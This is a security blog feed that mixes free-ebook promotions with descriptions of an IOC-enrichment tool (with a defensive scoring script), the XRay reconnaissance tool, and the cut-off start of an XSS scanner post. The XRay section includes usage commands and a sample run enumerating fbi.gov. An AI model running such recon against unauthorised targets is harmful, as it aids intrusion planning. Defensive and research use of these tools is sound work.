Hackers Online Club (HOC) | Get Updates of latest Tools, Infosec, Vulnerabilities and Cyber Security tutorials. (HackersOnlineClub, http://www.blogger.com/profile/09881375775340083915; feed updated 2024-02-07)
Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time (published 2020-04-20)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqgV4I0zx6Q_07Xqwjl1iYeiFIyWbXFeweK7DbYFmTUYKPiUo6xN4-BLcbpBk9vNXJQSJ9KAWAZtysGSIpczzzaBYx-kX4_oESY_XZpJpVAIuJHGPrChpfxb4eeYme6MdwqhBaTRS8_0md/s1600/Web+Codding.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="421" data-original-width="750" height="359" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqgV4I0zx6Q_07Xqwjl1iYeiFIyWbXFeweK7DbYFmTUYKPiUo6xN4-BLcbpBk9vNXJQSJ9KAWAZtysGSIpczzzaBYx-kX4_oESY_XZpJpVAIuJHGPrChpfxb4eeYme6MdwqhBaTRS8_0md/s640/Web+Codding.png" width="640" /></a></div>
<br />
<h2 style="text-align: left;">
<span style="color: #073763;">"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"</span></h2>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Speak the languages that power the web.</span></h3>
<br />
With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.<br />
<br />
If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.<br />
<br />
Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.<br />
<br />
<b>Get the lowdown on coding basics</b><br />
<ul style="text-align: left;">
<li>Review HTML and CSS</li>
<li>Make sense of JavaScript, jQuery, PHP, and MySQL</li>
<li>Create code for web and mobile apps</li>
<li>There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!</li>
</ul>
<br />
<b><span style="color: #073763;">Free offer expires 4/22/2020</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://hackersonlineclub.tradepub.com/free/w_wile288/prgm.cgi" target="_blank"><img border="0" data-original-height="996" data-original-width="698" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil2igEJYOzJoKwuAP_R2yLR4yLy9v-tXTITd8rkVENPD7hjQYwPgJ-k3C7uMSKg-AUpu23bPPI-WB43YKJEkarwij06b1_ICPeimyMU5xAUcaAiq-wkSgbRvrAzKehwE8qGSc1rAoJYsrc/s320/Screenshot+2020-04-20+at+11.51.40+AM.png" width="224" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://hackersonlineclub.tradepub.com/free/w_wile288/prgm.cgi" target="_blank"><b>DOWNLOAD NOW!</b></a></div>
<br /></div>
Smart OSINT Collection of Common IOC Types (published 2020-01-31)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFaDpc66Cf9-ghz_87cgX_3DQvASLiNcVx8P-VyE2yE_YgY8wea8sAArOv3T7ebZuQ05-PdltiTNLnrM8Lw1Nm0rIcmnTig6uXniXPYaV8Tmmw-Crx1dE-AALUJJYgWQ4Ay6aEhV_4QlMV/s1600/Mimir+OSINT+Collections.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="419" data-original-width="662" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFaDpc66Cf9-ghz_87cgX_3DQvASLiNcVx8P-VyE2yE_YgY8wea8sAArOv3T7ebZuQ05-PdltiTNLnrM8Lw1Nm0rIcmnTig6uXniXPYaV8Tmmw-Crx1dE-AALUJJYgWQ4Ay6aEhV_4QlMV/s1600/Mimir+OSINT+Collections.png" /></a></div>
<br />
<h2 style="text-align: left;">
<span style="color: #073763;">Smart OSINT Collection of Common IOC (Indicator of compromise) Types</span></h2>
<br />
This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.<br />
<br />
The project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. The application aims to give you knowledge about IOCs and then some added "wisdom": it calculates a risk score per IOC, assigns a common malware family name to hash lookups based on reports from VirusTotal and OPSWAT, and uses machine learning tools to determine whether an IP, URL, or domain is likely to be malicious.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Base Collection</span></h3>
For network based IOCs, Mimir gathers basic information including:<br />
<ul style="text-align: left;">
<li>Whois</li>
<li>ASN</li>
<li>Geolocation</li>
<li>Reverse DNS</li>
<li>Passive DNS</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Collection Sources</span></h3>
Some of these sources require an API key, and a few are only available with a paid account; reliance on paid services has been kept to a minimum.<br />
<ul style="text-align: left;">
<li>PassiveTotal</li>
<li>VirusTotal</li>
<li>DomainTools</li>
<li>OPSWAT</li>
<li>Google SafeBrowsing</li>
<li>Shodan</li>
<li>PulseDive</li>
<li>CSIRTG</li>
<li>URLscan</li>
<li>HpHosts</li>
<li>Blacklist checks</li>
<li>Spam blacklist checks</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Risk Scoring</span></h3>
The risk scoring works best when Mimir can gather a decent number of data points for an IOC: passive DNS and well-populated URL/domain results (communicating samples, associated samples, recent scan data, etc.). It also takes the ML maliciousness prediction into account.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Machine Learning Predictions</span></h3>
The machine learning prediction results come from the CSIRT Gadgets projects <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.</span><br />
<br />
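As an added example (not Mimir's own code), the Python below does in miniature what the description above covers: it refangs indicators as they appear in reports (hxxp, [.]), classifies each one as an IP, domain, URL or hash, and folds the gathered data points plus an ML maliciousness probability into a per-IOC risk score, reporting alongside it a confidence value that reflects how many data points were actually available. The evidence field names, weights and caps are assumptions chosen for illustration, not Mimir's scoring model, and the sample lookups are constructed.

```python
"""Classify common IOC types and combine per-IOC evidence into a risk score.

Added example, not Mimir's code. Evidence field names, weights and caps are
assumptions for illustration; the sample data at the bottom is constructed.
"""
import ipaddress
import re
from typing import Dict, Iterable, List, Optional, Tuple
from urllib.parse import urlparse

# Hash types accepted, keyed by hex-digest length.
HASH_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}
_HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
# Hostname labels per RFC 1035, with an alphabetic top-level label.
_DOMAIN_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.IGNORECASE
)


def refang(value: str) -> str:
    """Undo the defanging (hxxp, [.], [:]) that threat reports apply to IOCs."""
    v = value.strip()
    v = re.sub(r"^hxxp", "http", v, flags=re.IGNORECASE)
    v = re.sub(r"\[\.\]|\(\.\)|\{\.\}", ".", v)
    return v.replace("[:]", ":")


def classify_ioc(value: str) -> Tuple[Optional[str], str]:
    """Return (ioc_type, normalized_value); ioc_type is ip, url, hash, domain or None."""
    v = refang(value).rstrip(".")
    if not v:
        return None, v
    try:
        return "ip", str(ipaddress.ip_address(v))  # handles IPv4 and IPv6
    except ValueError:
        pass
    if "://" in v:
        parsed = urlparse(v)
        if parsed.scheme.lower() in ("http", "https") and parsed.netloc:
            return "url", v
        return None, v
    if len(v) in HASH_LENGTHS and _HEX_RE.match(v):
        return "hash", v.lower()
    if _DOMAIN_RE.match(v):
        return "domain", v.lower()
    return None, v


# Assumed weights: (points per unit of evidence, cap on units counted).
EVIDENCE_WEIGHTS: Dict[str, Tuple[int, int]] = {
    "vendor_detections": (4, 10),      # engines/vendors flagging the IOC
    "communicating_samples": (3, 10),  # malware samples seen contacting it
    "associated_samples": (2, 10),     # samples that embed or reference it
    "blacklist_hits": (8, 5),          # blocklists / spam lists listing it
}
ML_WEIGHT = 30  # maximum contribution of the ML maliciousness probability


def risk_score(evidence: Dict[str, float],
               ml_malicious_prob: Optional[float] = None) -> Tuple[int, float]:
    """Return (score 0-100, confidence 0-1).

    Confidence is the share of evidence types actually populated, so a high
    score backed by a single source is flagged as low-confidence.
    """
    score = 0.0
    populated = 0
    for key, (weight, cap) in EVIDENCE_WEIGHTS.items():
        count = evidence.get(key, 0)
        if count > 0:
            populated += 1
            score += min(count, cap) * weight
    if ml_malicious_prob is not None:
        populated += 1
        score += ML_WEIGHT * max(0.0, min(1.0, ml_malicious_prob))
    confidence = populated / (len(EVIDENCE_WEIGHTS) + 1)
    return min(100, round(score)), round(confidence, 2)


def triage(raw_iocs: Iterable[str], lookups: Dict[str, Dict[str, float]]) -> List[dict]:
    """Classify each raw IOC and score it with whatever evidence `lookups` holds."""
    results = []
    for raw in raw_iocs:
        ioc_type, value = classify_ioc(raw)
        if ioc_type is None:
            results.append({"ioc": raw, "type": None, "score": None, "confidence": 0.0})
            continue
        evidence = lookups.get(value, {})
        # ML prediction applies to IP, URL and domain IOCs only, not hashes.
        ml = evidence.get("ml_malicious_prob") if ioc_type != "hash" else None
        score, confidence = risk_score(evidence, ml)
        results.append({"ioc": value, "type": ioc_type, "score": score, "confidence": confidence})
    return results


# Constructed sample input standing in for the enrichment lookups.
SAMPLE_IOCS = ["hxxp://evil[.]example[.]com/path", "203.0.113.7",
               "D41D8CD98F00B204E9800998ECF8427E", "not an ioc"]
SAMPLE_LOOKUPS = {
    "http://evil.example.com/path": {"vendor_detections": 12, "communicating_samples": 3,
                                     "blacklist_hits": 2, "ml_malicious_prob": 0.9},
    "203.0.113.7": {"vendor_detections": 1, "ml_malicious_prob": 0.2},
    "d41d8cd98f00b204e9800998ecf8427e": {"vendor_detections": 0},
}

if __name__ == "__main__":
    for row in triage(SAMPLE_IOCS, SAMPLE_LOOKUPS):
        print(row)
```

The confidence value is the part worth copying: the description above says scoring works best with a decent number of data points, and reporting how many sources were populated keeps a single noisy blacklist hit from being read as a high-confidence verdict.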
<h3 style="text-align: left;">
<span style="color: #073763;">Output</span></h3>
Mimir can output results in several formats, including local file reports and export to an external service.<br />
<br />
<b><span style="color: #073763;">stdout (console output)</span></b><br />
normalizes result data, printed with headers and subheaders per module<br />
<br />
<b><span style="color: #073763;">JSON file</span></b><br />
beautified output to local file<br />
<span style="color: #073763;"><br /></span>
<b><span style="color: #073763;">Excel</span></b><br />
uses multiple sheets per IOC type<br />
<br />
<b><span style="color: #073763;">MISP</span></b><br />
commit new indicators<br />
<br />
<b><span style="color: #073763;">ThreatConnect</span></b><br />
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)<br />
<br />
<span style="font-size: large;"><a href="https://github.com/deadbits/mimir" target="_blank">Download Smart OSINT Collection</a></span></div>
Cybersecurity - The Beginner's Guide ($29.99 Value) FREE For a Limited Time (published 2019-12-04)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi99zwJYlPre6I4bIIN8YExVT-IHvuYA7bEw9s8TSUUlDCneyyTtHQIlSS2kAfRSYHbmUIfvDAPawsYS_BDUGLd43FJqzacaJpwBQ3vdSW23-0mEXVvkiE7sODuHwrC7drDK6wAU8T_T6EK/s1600/Cyber+Security+Courses.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="425" data-original-width="682" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi99zwJYlPre6I4bIIN8YExVT-IHvuYA7bEw9s8TSUUlDCneyyTtHQIlSS2kAfRSYHbmUIfvDAPawsYS_BDUGLd43FJqzacaJpwBQ3vdSW23-0mEXVvkiE7sODuHwrC7drDK6wAU8T_T6EK/s1600/Cyber+Security+Courses.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;">"Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time".</span></h2>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Understand the nitty-gritty of Cybersecurity with ease</span></h3>
<br />
It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it, including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEOs like Satya Nadella, McAfee's CEO Chris Young, and Cisco's CIO Colin Seward shine a light on it from time to time.<br />
<br />
This book puts together all the possible information regarding cybersecurity: why you should choose it, the need for cybersecurity, and how you can be part of it and fill the cybersecurity talent gap bit by bit.<br />
<br />
<b><span style="color: #073763;">Features include how to:</span></b><br />
<br />
<ul style="text-align: left;">
<li>Align your security knowledge with industry leading concepts and tools</li>
<li>Acquire required skills and certifications to survive the ever changing market needs</li>
<li>Learn from industry experts to analyse, implement, and maintain a robust environment</li>
<li>By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.</li>
</ul>
<br />
<br />
<b>Free offer expires on 17 Dec 2019</b><br />
<br />
Offered Free by: Packt<br />
<br />
<div style="text-align: center;">
<span style="font-size: large;"><b><a href="https://hackersonlineclub.tradepub.com/free/w_pacb115/prgm.cgi" target="_blank">Download Now</a></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://hackersonlineclub.tradepub.com/free/w_pacb115/prgm.cgi" target="_blank"><img border="0" data-original-height="604" data-original-width="420" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYeJ112jlz9eUmyoiHQWyN3AQMAfq6no_oZPA-i6jueJMKqL3tHCOc-6nqiEaRqMaGtig7agPWumRGmdt4rWTvIWa_4JKjBaPC3_6Ux6IrYWB5hAvZh6Wl3vQ41O-HYAAVWkRKw8WtzJKC/s1600/Cyber+security+-+The+Beginner+Guide.png" /></a></div>
<br /></div>
Best Practices For Protecting Against Phishing, Ransomware and Email Fraud (published 2019-11-25)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpIpDW5YCMNDqdbGjOyewCnHvRLSPOrxkuw511hJ-m2eO88eLKyAOHG9MjfmOa84HAuzOgKr7MZFkIalVxzjEfGUs3mNEzlEPejm6XSTg5dVePbUTPIWu3JTIB2p7K1hwyVxcqQ9xsuiyb/s1600/Research+WhitePaper+KnowBe4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="310" data-original-width="546" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpIpDW5YCMNDqdbGjOyewCnHvRLSPOrxkuw511hJ-m2eO88eLKyAOHG9MjfmOa84HAuzOgKr7MZFkIalVxzjEfGUs3mNEzlEPejm6XSTg5dVePbUTPIWu3JTIB2p7K1hwyVxcqQ9xsuiyb/s1600/Research+WhitePaper+KnowBe4.png" /></a></div>
<h3 style="text-align: left;">
<span style="color: #073763;">"Best Practices for Protecting Against Phishing, Ransomware and Email Fraud"</span></h3>
<div style="text-align: left;">
<span style="font-weight: normal;">Osterman Research conducted a survey among corporate decision makers in early 2018 and found that nearly 28% of those organizations had experienced a phishing attack that succeeded in infecting their networks with malware.</span><span style="font-weight: normal;"><br /></span><span style="font-weight: normal;"><br /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;">Over 17% of organizations had email used as part of a CEO Fraud/BEC attack that successfully tricked one or more of their senior executives in the last 12 months. Don’t let this happen to your organization.</span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span><span style="font-weight: normal;">Download the Osterman Research Whitepaper, Best Practices for Protecting Against Phishing, Ransomware and Email Fraud, and learn ten best practices you should consider to better protect your systems and network, train your users to be security-aware, and safeguard your organization’s sensitive and confidential data from phishing attacks, ransomware, and CEO Fraud.</span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><a href="https://hackersonlineclub.tradepub.com/free/w_knoc60/prgm.cgi" target="_blank"><span style="font-size: large;">Download Free eBook</span></a></span></div>
</div>
XRay - Using For Recon Mapping And OSINT Suite (published 2019-11-11)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSge_MxNfPWns77RqMYvD-VGXViWvDclTJYSAutb6fKFKpUCZ2sshp1z5mgWFY5qp7sBXmg2eBtNoixuMqqdieqSfIrdA6LQIqHNguKOrzpauegIcVFPZ5ghy1XJmjnn5w7V3pfpNYjo2W/s1600/XRAY.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="463" data-original-width="725" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSge_MxNfPWns77RqMYvD-VGXViWvDclTJYSAutb6fKFKpUCZ2sshp1z5mgWFY5qp7sBXmg2eBtNoixuMqqdieqSfIrdA6LQIqHNguKOrzpauegIcVFPZ5ghy1XJmjnn5w7V3pfpNYjo2W/s640/XRAY.png" width="640" /></a></div>
<br />
XRay is a tool for recon, mapping and OSINT gathering from public networks.<br />
<br />
Its goal is to automate some of the initial tasks of information gathering and network mapping.<br />
<h3 style="text-align: left;">
<span style="color: #073763;">How Does it Work?</span></h3>
<b>XRay is a very simple tool; it works this way:</b><br />
<ol style="text-align: left;">
<li>It'll bruteforce subdomains using a wordlist and DNS requests.</li>
<li>For every subdomain/ip found, it'll use Shodan to gather open ports and other intel.</li>
<li>If a ViewDNS API key is provided, for every subdomain historical data will be collected.</li>
<li>For every unique IP address, and for every open port, it'll launch specific banner grabbers and info collectors.</li>
<li>Eventually the data is presented to the user on the web ui.</li>
</ol>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Grabbers and Collectors</span></h3>
<ul style="text-align: left;">
<li>HTTP Server, X-Powered-By and Location headers.</li>
<li>HTTP and HTTPS robots.txt disallowed entries.</li>
<li>HTTPS certificates chain ( with recursive subdomain grabbing from CN and Alt Names ).</li>
<li>HTML title tag.</li>
<li>DNS version.bind. and hostname.bind. records.</li>
<li>MySQL, SMTP, FTP, SSH, POP and IRC banners.</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Notes</span></h3>
<b>Shodan API Key</b><br />
<br />
The <span style="background-color: white; color: #274e13; font-family: "courier new" , "courier" , monospace;">shodan.io</span> API key parameter ( <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-shodan-key KEY</span> ) is optional; however, if it is not specified, no service fingerprinting will be performed and a lot less information will be shown (basically it will just be DNS subdomain enumeration).<br />
<br />
<b>ViewDNS API Key</b><br />
<br />
If a <a href="http://viewdns.info/" target="_blank">ViewDNS</a> API key parameter ( <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-viewdns-key KEY</span> ) is passed, domain historical data will also be retrieved.<br />
<br />
<b>Anonymity and Legal Issues</b><br />
<br />
The software will rely on your main DNS resolver in order to enumerate subdomains, also, several connections might be directly established from your host to the computers of the network you're scanning in order to grab banners from open ports. Technically, you're just connecting to public addresses with open ports (and there's no port scanning involved, as such information is grabbed indirectly using Shodan API), but you know, someone might not like such behaviour.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Building a Docker image</span></h3>
To build a Docker image with the latest version of XRay:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">git clone https://github.com/evilsocket/xray.git</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cd xray</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">docker build -t xraydocker .</span><br />
<br />
Once built, XRay can be started within a Docker container using the following:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">docker run --rm -it -p 8080:8080 xraydocker xray -address 0.0.0.0 -shodan-key shodan_key_here -domain example.com </span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Manual Compilation</span></h3>
Make sure you are using Go >= 1.7, that your installation is working properly, that you have set the $GOPATH variable and you have appended <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$GOPATH/bin</span> to your <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$PATH</span>.<br />
<br />
<b>Then:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">go get github.com/evilsocket/xray</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">cd $GOPATH/src/github.com/evilsocket/xray/</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">make</span><br />
<br />
You'll find the executable in the build folder.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Usage: xray -shodan-key YOUR_SHODAN_API_KEY -domain TARGET_DOMAIN</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Options:</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -address string</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> IP address to bind the web ui server to. (default "127.0.0.1")</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -consumers int</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Number of concurrent consumers to use for subdomain enumeration. (default 16)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -domain string</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Base domain to start enumeration from.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -port int</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> TCP port to bind the web ui server to. (default 8080)</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -preserve-domain</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Do not remove subdomain from the provided domain name.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -session string</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Session file name. (default "&lt;domain-name&gt;-xray-session.json")</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -shodan-key string</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Shodan API key.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -viewdns-key string</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> ViewDNS API key.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> -wordlist string</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> Wordlist file to use for enumeration. (default "wordlists/default.lst")</span><br />
<br />
<b>Example:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"># xray -shodan-key yadayadayadapicaboo... -viewdns-key foobarsomethingsomething... -domain fbi.gov</span><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">____ ___</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">\ \/ /</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> \ RAY v 1.0.0b</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> / by Simone 'evilsocket' Margaritelli</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/___/\ \</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> \_/</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">@ Saving session to fbi.gov-xray-session.json</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">@ Web UI running on http://127.0.0.1:8080/</span><br />
<br />
<span style="font-size: large;"><a href="https://github.com/evilsocket/xray" target="_blank">Download XRay</a></span></div>
Hacking for Dummies, 6th Edition ($29.99 Value) Free (published 2019-10-14)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXVF7-iRdsvX_95Mw9NCT1Fcd9H1L7K_dIYAt8wMQkn4uUNsMKPyczDs8ttlNebCoxMQfReccwEpYnggrIkcP3uB3y5-k3Nz_gOmFAKjnLg2wvo9A5x5OaNXCXB69F5pdk7TBrOsfeLp2x/s1600/Keyboard+Hackers-compressed.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="368" data-original-width="598" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXVF7-iRdsvX_95Mw9NCT1Fcd9H1L7K_dIYAt8wMQkn4uUNsMKPyczDs8ttlNebCoxMQfReccwEpYnggrIkcP3uB3y5-k3Nz_gOmFAKjnLg2wvo9A5x5OaNXCXB69F5pdk7TBrOsfeLp2x/s1600/Keyboard+Hackers-compressed.jpg" /></a></div>
<br />
<h2 style="text-align: left;">
<span style="color: #073763;">"Hacking for Dummies, 6th Edition ($29.99 Value) Free for a Limited Time"</span></h2>
<h3 style="text-align: left;">
<span style="color: #073763;">Stop hackers before they hack you!</span></h3>
<br />
In order to outsmart a would-be hacker, you need to get into the hacker’s mindset and with this book, thinking like a bad guy has never been easier. Get expert knowledge on penetration testing, vulnerability assessments, security best practices, and ethical hacking that is essential in order to stop a hacker in their tracks.<br />
<br />
This no-nonsense book helps you learn how to recognize the vulnerabilities in your systems so you can safeguard them more diligently—with confidence and ease.<br />
<ul style="text-align: left;">
<li>Get up to speed on Windows 10 hacks </li>
<li>Learn about the latest mobile computing hacks</li>
<li>Get free testing tools </li>
<li>Find out about new system updates and improvements</li>
<li>There’s no such thing as being too safe — and this resourceful guide helps ensure you’re protected.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://hackersonlineclub.tradepub.com/free/w_wile275/prgm.cgi" target="_blank"><img border="0" data-original-height="600" data-original-width="430" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Sgeejr2rR22YWzD_EcEvMDBFKCVu4FSHdK7kFKkadM92EzvZ2DI_Y1o_T9HHf3T2SkG8ZgIwxA3OQt5Y86X6I4c2cBSPm3kZPYfqyTJdFnE1C0tTdWLGexQqmk71_KAzzC5yKMNkcYGV/s1600/Hacking+For+dummies+6th+Edition.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: large;"><a href="https://hackersonlineclub.tradepub.com/free/w_wile275/prgm.cgi" target="_blank">DOWNLOAD NOW</a></span></div>
<br />
<br />
Free offer expires 10/15/19<br />
<br />
Offered Free by: Wiley</div>
TraXSS - Automated XSS Vulnerability Scanner (published 2019-10-14)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghkkzCxRE_j02pan-R3S4Nx1iMMowdPRircUaY-oSKCpzzPEAG-XuqKqlZUrjabNsMvyZHhQIJvHj3M8oaJpa5zMtb6xch6yQT0TQsJrlGPbAZa2Vw6gpkIAO3sRX5VofslpBlIzMRhEpK/s1600/TraXSS.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="519" data-original-width="717" height="463" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghkkzCxRE_j02pan-R3S4Nx1iMMowdPRircUaY-oSKCpzzPEAG-XuqKqlZUrjabNsMvyZHhQIJvHj3M8oaJpa5zMtb6xch6yQT0TQsJrlGPbAZa2Vw6gpkIAO3sRX5VofslpBlIzMRhEpK/s640/TraXSS.png" width="640" /></a></div>
<ul style="text-align: left;">
<li><span style="color: #073763;">Automated Vulnerability Scanner for XSS</span></li>
<li><span style="color: #073763;">Written in Python3</span></li>
</ul>
<br />
Traxss is an automated framework to scan URLs and webpages for XSS Vulnerabilities. It includes over 575 Payloads to test with and multiple options for robustness of tests.<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Getting Started</span></h3>
<b>Prerequisites</b><br />
Traxss depends on Chromedriver. On MacOS this can be installed with the homebrew command:<br />
<br />
